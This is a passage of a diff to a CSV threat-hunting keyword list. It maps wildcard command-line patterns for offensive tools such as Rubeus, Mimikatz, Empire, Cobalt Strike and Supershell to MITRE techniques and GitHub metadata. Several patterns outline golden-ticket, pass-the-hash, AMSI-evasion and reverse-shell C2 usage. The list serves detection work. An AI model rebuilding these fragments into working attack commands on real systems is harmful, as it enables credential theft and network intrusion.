It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /service:krbtgt *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /simple * /spn*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket:* /autoenterprise *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket:*.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* /user:* /domain:* /aes256:* /run:powershell.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* /user:* /domain:* /ntlm:* /run:powershell.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash (more risky than Rubeus writes to LSASS memory)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* /user:* /domain:* /sid:S-1-5-21-* /krbtgt:* /id:* /groups:* /startoffset:0 /endin:600 /renewmax:10080 /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Golden ticket (domain admin w/ some ticket properties to avoid detection)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* /usetgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* \Temp\blah.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* /usetgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* \Temp\blah.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* | Find-AmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* | Test-ContainsAmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* > \\127.0.0.1\ADMIN$\__* 2>&1","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* > Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"* 0.0.0.0:8080 --threads*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" -"* 1.2.3.4:8080*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"* > Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* 0.0.0.0:8080 --threads*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"* 1.2.3.4:8080*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "* 4444 meter","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* 4444 shell","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" -"* '46993522-7D77-4B59-9B77-F82082DE9D81' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"* '46993522-7D77-4B59-9B77-F82082DE9D81' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "* -64 -format=bof *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -64 -format=dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -64 -format=service-dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"* -a 1 -f *.dll -p http*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* -a 1 -f *.dll -p http*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "* -a bruteforce *","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "* -a nightmare*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* -a spoolsample*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" -"* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"* aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"* aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* acarsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --access-token*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* acltoolkit*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" @@ -90,46 +90,46 @@ "* ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" "* adhunt.py *","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "* adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" -"* admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 